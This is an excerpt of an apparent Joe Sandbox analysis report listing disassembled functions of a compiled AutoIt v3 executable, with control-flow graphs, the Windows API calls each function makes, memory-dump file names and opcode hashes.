                                                                                                                control_flow_graph 986 22ba66-22ba93 call 227750 call 228984 call 227616 993 22bab0-22bab5 986->993 994 22ba95-22baab call 22f630 986->994 996 22babb-22bac2 993->996 1000 22bd05-22bd0a call 227795 994->1000 998 22bac4-22baf3 996->998 999 22baf5-22bb04 GetStartupInfoW 996->999 998->996 1001 22bc33-22bc39 999->1001 1002 22bb0a-22bb0f 999->1002 1003 22bcf7-22bd03 call 22bd0b 1001->1003 1004 22bc3f-22bc50 1001->1004 1002->1001 1006 22bb15-22bb2c 1002->1006 1003->1000 1007 22bc52-22bc55 1004->1007 1008 22bc65-22bc6b 1004->1008 1011 22bb33-22bb36 1006->1011 1012 22bb2e-22bb30 1006->1012 1007->1008 1013 22bc57-22bc60 1007->1013 1014 22bc72-22bc79 1008->1014 1015 22bc6d-22bc70 1008->1015 1017 22bb39-22bb3f 1011->1017 1012->1011 1018 22bcf1-22bcf2 1013->1018 1019 22bc7c-22bc88 GetStdHandle 1014->1019 1015->1019 1020 22bb61-22bb69 1017->1020 1021 22bb41-22bb52 call 227616 1017->1021 1018->1001 1023 22bc8a-22bc8c 1019->1023 1024 22bccf-22bce5 1019->1024 1022 22bb6c-22bb6e 1020->1022 1030 22bbe6-22bbed 1021->1030 1031 22bb58-22bb5e 1021->1031 1022->1001 1027 22bb74-22bb79 1022->1027 1023->1024 1028 22bc8e-22bc97 GetFileType 1023->1028 1024->1018 1026 22bce7-22bcea 1024->1026 1026->1018 1032 22bbd3-22bbe4 1027->1032 1033 22bb7b-22bb7e 1027->1033 1028->1024 1034 22bc99-22bca3 1028->1034 1038 22bbf3-22bc01 1030->1038 1031->1020 1032->1022 1033->1032 1035 22bb80-22bb84 1033->1035 1036 22bca5-22bcab 1034->1036 1037 22bcad-22bcb0 1034->1037 1035->1032 1039 22bb86-22bb88 1035->1039 1040 22bcb8 1036->1040 1041 22bcb2-22bcb6 1037->1041 1042 22bcbb-22bccd InitializeCriticalSectionAndSpinCount 1037->1042 1043 22bc03-22bc25 1038->1043 1044 22bc27-22bc2e 1038->1044 1045 22bb8a-22bb96 GetFileType 1039->1045 1046 22bb98-22bbcd InitializeCriticalSectionAndSpinCount 1039->1046 1040->1042 1041->1040 1042->1018 1043->1038 1044->1017 1045->1046 1047 22bbd0 1045->1047 1046->1047 1047->1032
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 0022BA74
                                                                                                                  • Part of subcall function 00228984: __mtinitlocknum.LIBCMT ref: 00228996
                                                                                                                  • Part of subcall function 00228984: EnterCriticalSection.KERNEL32(00220127,?,0022876D,0000000D), ref: 002289AF
                                                                                                                • __calloc_crt.LIBCMT ref: 0022BA85
                                                                                                                  • Part of subcall function 00227616: __calloc_impl.LIBCMT ref: 00227625
                                                                                                                  • Part of subcall function 00227616: Sleep.KERNEL32(00000000,?,00220127,?,0020125D,00000058,?,?), ref: 0022763C
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0022BAA0
                                                                                                                • GetStartupInfoW.KERNEL32(?,002B6990,00000064,00226B14,002B67D8,00000014), ref: 0022BAF9
                                                                                                                • __calloc_crt.LIBCMT ref: 0022BB44
                                                                                                                • GetFileType.KERNEL32(00000001), ref: 0022BB8B
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0022BBC4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1426640281-0
                                                                                                                • Opcode ID: 6ac2799e90a0fe6404d4d01f33813741344005b643df9212d55e98a2d2b4a563
                                                                                                                • Instruction ID: 28fb7309fc356099900cfc41dccbde68c9c1bdbf2417be94fba701cf00ca39c6
                                                                                                                • Opcode Fuzzy Hash: 6ac2799e90a0fe6404d4d01f33813741344005b643df9212d55e98a2d2b4a563
                                                                                                                • Instruction Fuzzy Hash: 28812970925366EFCB15CFA8E8846ADBBF0AF45324B24425ED466AB3D1CB349813CF54
                                                                                                                Function 002045A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1048 2045a7-2045e0 1049 275935-275936 DestroyWindow 1048->1049 1050 2045e6-2045fe mciSendStringW 1048->1050 1053 275941-275944 1049->1053 1051 204604-20460a 1050->1051 1052 2047a6-2047b3 1050->1052 1054 204610-204625 call 203029 1051->1054 1055 2047e7-2047f4 1051->1055 1056 2047b5-2047d0 UnregisterHotKey 1052->1056 1057 2047d8-2047df 1052->1057 1060 275946-275958 call 2050ec 1053->1060 1061 27595a-275976 FindClose call 22017e 1053->1061 1069 27598d-275999 1054->1069 1070 20462b-204633 1054->1070 1055->1053 1059 2047fa-204801 1055->1059 1056->1057 1063 2047d2-2047d3 call 21f902 1056->1063 1057->1051 1058 2047e5 1057->1058 1058->1052 1059->1054 1066 204807 1059->1066 1077 275977-275987 call 22017e 1060->1077 1061->1077 1063->1057 1066->1055 1075 2759a3-2759aa 1069->1075 1076 27599b-27599d FreeLibrary 1069->1076 1073 2759b1-2759be 1070->1073 1074 204639-20465e call 212570 1070->1074 1081 2759e5-2759ec 1073->1081 1082 2759c0-2759dd VirtualFree 1073->1082 1087 204660 1074->1087 1088 204695-2046a0 CoUninitialize 1074->1088 1075->1069 1080 2759ac 1075->1080 1076->1075 1077->1069 1080->1073 1081->1073 1086 2759ee 1081->1086 1082->1081 1085 2759df-2759e0 call 24d323 1082->1085 1085->1081 1091 2759f3-2759f6 1086->1091 1090 204663-204693 call 202f0e call 202d7f 1087->1090 1088->1091 1092 2046a6-20475a call 2032c9 call 202e6d call 205cd3 call 204208 call 202e54 call 202de4 call 205cd3 call 212570 call 202e54 call 202c64 * 2 call 202e54 call 21f8a4 call 202c64 call 202e8f call 202f47 call 205cd3 call 205202 1088->1092 1090->1088 1091->1092 1093 2759fc-275a02 1091->1093 1134 20475f-2047a5 call 203d9b * 2 call 205cd3 * 3 call 203282 1092->1134 1093->1092
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002045F0
                                                                                                                • CoUninitialize.COMBASE ref: 00204695
                                                                                                                • UnregisterHotKey.USER32(?), ref: 002047BD
                                                                                                                • DestroyWindow.USER32(?), ref: 00275936
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0027599D
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002759CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: e40949b0b00386f2482f51b3fab6c9678776d0787c277d107cd4a96b0e156f76
                                                                                                                • Instruction ID: b75b4882335066a58abdd1fbd04366f7ca7b21c6e1b093a7e09bda6f698760aa
                                                                                                                • Opcode Fuzzy Hash: e40949b0b00386f2482f51b3fab6c9678776d0787c277d107cd4a96b0e156f76
                                                                                                                • Instruction Fuzzy Hash: 61915074621712CFD719EF14D899A69F3A8FF15300F5081AAE50A972A3DB30AD7ACF50
                                                                                                                Function 0021EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1202 21eb05-21eb2f call 20c4cd RegOpenKeyExW 1205 274b17-274b2e RegQueryValueExW 1202->1205 1206 21eb35-21eb39 1202->1206 1207 274b91-274b9a RegCloseKey 1205->1207 1208 274b30-274b6d call 22010a call 204bce RegQueryValueExW 1205->1208 1213 274b6f-274b86 call 207e53 1208->1213 1214 274b88-274b90 call 204fd2 1208->1214 1213->1214 1214->1207
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0021EADA,?,?), ref: 0021EB27
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0021EADA,?,?), ref: 00274B26
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0021EADA,?,?), ref: 00274B65
                                                                                                                • RegCloseKey.ADVAPI32(?,?,0021EADA,?,?), ref: 00274B94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                • Opcode ID: 343d84e5346b855b1c1638d1dce85be5a23224832a8ebaa4a7c59b88bf58f36e
                                                                                                                • Instruction ID: b9dd719444e32e64aba615c160e86e988439f2e905f4717c8ab8e5bc2ecba4af
                                                                                                                • Opcode Fuzzy Hash: 343d84e5346b855b1c1638d1dce85be5a23224832a8ebaa4a7c59b88bf58f36e
                                                                                                                • Instruction Fuzzy Hash: 8B117F71A15208BEEB04AFA4DC86EFE77BCEF04358F104055B506E70D1EA70AE25EB50
                                                                                                                Function 00202E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1229 202e9d-202f0d CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00202ECB
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00202EEC
                                                                                                                • ShowWindow.USER32(00000000), ref: 00202F00
                                                                                                                • ShowWindow.USER32(00000000), ref: 00202F09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: 3bbb18ef4146e84afabed64875b9283a5a8cb856be9df963b8769e50937d8029
                                                                                                                • Instruction ID: 85a1abe198b9788a3079b7fc0366c2b8aef70d02fa6775965ab82c487b91d4b9
                                                                                                                • Opcode Fuzzy Hash: 3bbb18ef4146e84afabed64875b9283a5a8cb856be9df963b8769e50937d8029
                                                                                                                • Instruction Fuzzy Hash: E6F03A70A502D07AEB305763BC0EE672E7EEBC7F20B01401EBE08A21A1D16508B5DAB0
                                                                                                                Function 00203DCB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 258COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1230 203dcb-203df1 call 203f9b 1233 203df7-203e04 call 203f9b 1230->1233 1234 2739f9-273a09 call 24cc82 1230->1234 1233->1234 1239 203e0a-203e10 1233->1239 1238 273a0e-273a10 1234->1238 1240 273a12-273a15 call 203e39 1238->1240 1241 273a2f-273a77 call 22010a 1238->1241 1242 203e16-203e36 call 20bdf0 1239->1242 1243 273a1a-273a29 call 24757b 1239->1243 1240->1243 1249 273a79-273a96 call 21ac65 1241->1249 1250 273a98 1241->1250 1243->1241 1254 273a9a-273aad 1249->1254 1250->1254 1256 273c24-273c27 call 2228ca 1254->1256 1257 273ab3 1254->1257 1260 273c2c-273c35 call 203e39 1256->1260 1259 273aba-273abd call 243460 1257->1259 1263 273ac2-273ae4 call 20b7ff call 24a5be 1259->1263 1266 273c37-273c47 call 205800 call 24a46f 1260->1266 1273 273ae6-273af3 1263->1273 1274 273af8-273b02 call 24a5a8 1263->1274 1282 273c4c-273c7c call 2432b0 call 22017e call 2228ca call 203e39 1266->1282 1277 273beb-273bfb call 20b6d0 1273->1277 1280 273b04-273b17 1274->1280 1281 273b1c-273b26 call 24a592 1274->1281 1277->1263 1286 273c01-273c0b call 20a870 1277->1286 1280->1277 1291 273b3a-273b44 call 21df5b 1281->1291 1292 273b28-273b35 1281->1292 1282->1266 1290 273c10-273c1e 1286->1290 1290->1256 1290->1259 1291->1277 1299 273b4a-273b62 call 2430ac 1291->1299 1292->1277 1304 273b85-273b88 1299->1304 1305 273b64-273b67 call 20caee 1299->1305 1306 273bb6-273bb9 1304->1306 1307 273b8a-273ba5 call 20caee call 2434b4 call 205cd3 1304->1307 1312 273b6c-273b83 call 205cd3 1305->1312 1309 273bbb-273bc4 call 242fcd 1306->1309 1310 273bd9-273bdc call 24a525 1306->1310 1328 273ba6-273bb4 call 20b7ff 1307->1328 1309->1282 1321 273bca-273bd4 call 22017e 1309->1321 1318 273be1-273bea call 22017e 1310->1318 1312->1328 1318->1277 1321->1263 1328->1318
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002034E2,?,00000001), ref: 00203FCD
                                                                                                                • _free.LIBCMT ref: 00273C27
                                                                                                                • _free.LIBCMT ref: 00273C6E
                                                                                                                  • Part of subcall function 0020BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002C22E8,?,00000000,?,00203E2E,?,00000000,?,0029DBF0,00000000,?), ref: 0020BE8B
                                                                                                                  • Part of subcall function 0020BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00203E2E,?,00000000,?,0029DBF0,00000000,?,00000002), ref: 0020BEA7
                                                                                                                  • Part of subcall function 0020BDF0: __wsplitpath.LIBCMT ref: 0020BF19
                                                                                                                  • Part of subcall function 0020BDF0: _wcscpy.LIBCMT ref: 0020BF31
                                                                                                                  • Part of subcall function 0020BDF0: _wcscat.LIBCMT ref: 0020BF46
                                                                                                                  • Part of subcall function 0020BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0020BF56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<
                                                                                                                • API String ID: 1510338132-2925545299
                                                                                                                • Opcode ID: 50fd7e5c46a847f973ee07e5c5713a85fae8f93f9339dfd83d0460740f58663f
                                                                                                                • Instruction ID: e93c263508a4e4da67bdd15ece796da24a89f9345e38eb80a67fdf0bd6c06794
                                                                                                                • Opcode Fuzzy Hash: 50fd7e5c46a847f973ee07e5c5713a85fae8f93f9339dfd83d0460740f58663f
                                                                                                                • Instruction Fuzzy Hash: 84916171920219AFCF04EFA4CC929EEB7B4BF09310F50452AF416AB292DB749A25DF50
                                                                                                                Function 00203A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1333 203a67-203a85 SHGetMalloc 1334 274ac2-274ad1 call 203b1e 1333->1334 1335 203a8b-203a97 SHGetDesktopFolder 1333->1335 1336 203b06-203b11 1335->1336 1337 203a99-203ac6 call 203b1e 1335->1337 1336->1334 1343 203b17-203b1d 1336->1343 1345 203ac8-203adc SHGetPathFromIDListW 1337->1345 1346 203afd-203b01 1337->1346 1347 203af1-203af9 1345->1347 1348 203ade-203af0 call 203b1e 1345->1348 1346->1336 1347->1346 1348->1347
                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(1< ), ref: 00203A7D
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00203AD2
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00203A8F
                                                                                                                  • Part of subcall function 00203B1E: _wcsncpy.LIBCMT ref: 00203B32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                • String ID: 1<
                                                                                                                • API String ID: 3981382179-2457145218
                                                                                                                • Opcode ID: 348d2a4fa7b90a39bc006885c5eef602733834f09a752674c01d4d1a712a2810
                                                                                                                • Instruction ID: f22751a383914c81bdef7b4a1cdbf9c0c5ccf3ad618e1fc3ce8247ee940de466
                                                                                                                • Opcode Fuzzy Hash: 348d2a4fa7b90a39bc006885c5eef602733834f09a752674c01d4d1a712a2810
                                                                                                                • Instruction Fuzzy Hash: 78215E76B01218ABCB14DF95DC88DEEB7BDEF88704B1040A8F50AD7291DB709E56CB90
                                                                                                                Function 0021C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0021C948,SwapMouseButtons,00000004,?), ref: 0021C979
                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0021C948,SwapMouseButtons,00000004,?,?,?,?,0021BF22), ref: 0021C99A
                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,0021C948,SwapMouseButtons,00000004,?,?,?,?,0021BF22), ref: 0021C9BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 607fdf951584907afec1eb4415b85e4bae4d8a55778730311ab7a8add37b57e4
                                                                                                                • Instruction ID: 12110bbd3065241611ae3ec0b18e8ef95463ece1d4e5f9a03c1ee0613ce2e3a8
                                                                                                                • Opcode Fuzzy Hash: 607fdf951584907afec1eb4415b85e4bae4d8a55778730311ab7a8add37b57e4
                                                                                                                • Instruction Fuzzy Hash: 4B117C79561208FFDB218F64DC44EFE77FCEF14750F20445AA841E7210D231AEA49B60
                                                                                                                Function 0024CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002041A7: _fseek.LIBCMT ref: 002041BF
                                                                                                                  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF49
                                                                                                                  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF5C
                                                                                                                • _free.LIBCMT ref: 0024CDC9
                                                                                                                • _free.LIBCMT ref: 0024CDD0
                                                                                                                • _free.LIBCMT ref: 0024CE3B
                                                                                                                  • Part of subcall function 002228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228DE
                                                                                                                  • Part of subcall function 002228CA: GetLastError.KERNEL32(00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228F0
                                                                                                                • _free.LIBCMT ref: 0024CE43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                • Instruction ID: b18f614be5989f3d05b78e2f57792e5f8240296c2d4f194278bc536716731ab0
                                                                                                                • Opcode Fuzzy Hash: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                • Instruction Fuzzy Hash: 175153B1D14218AFDF199F68DC81AADB7B9FF48300F1040AEF61DA3291D7715A908F69
                                                                                                                Function 00203BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00273CF1
                                                                                                                • GetOpenFileNameW.COMDLG32(?,?,00000001,002C22E8), ref: 00273D35
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                  • Part of subcall function 00203A67: SHGetMalloc.SHELL32(1< ), ref: 00203A7D
                                                                                                                  • Part of subcall function 00203A67: SHGetDesktopFolder.SHELL32(?), ref: 00203A8F
                                                                                                                  • Part of subcall function 00203A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00203AD2
                                                                                                                  • Part of subcall function 00203B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002C22E8,?), ref: 00203B65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                • String ID: X
                                                                                                                • API String ID: 3714316930-3081909835
                                                                                                                • Opcode ID: 50b00e82506c4d6c225f33b9ad07d6dae52c204d1f40f591576ff4cbe6ed0a1d
                                                                                                                • Instruction ID: fe3184c5a226e680b6200cda4fa813caac282202858d9d212be5fef7d74d0f1f
                                                                                                                • Opcode Fuzzy Hash: 50b00e82506c4d6c225f33b9ad07d6dae52c204d1f40f591576ff4cbe6ed0a1d
                                                                                                                • Instruction Fuzzy Hash: AF118D71A202986BCF05DFD4D8055DE7BFDAF46704F00400EE401BB282DBB556598F91
                                                                                                                Function 002245EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00224603
                                                                                                                  • Part of subcall function 00228E52: __NMSG_WRITE.LIBCMT ref: 00228E79
                                                                                                                  • Part of subcall function 00228E52: __NMSG_WRITE.LIBCMT ref: 00228E83
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 0022460A
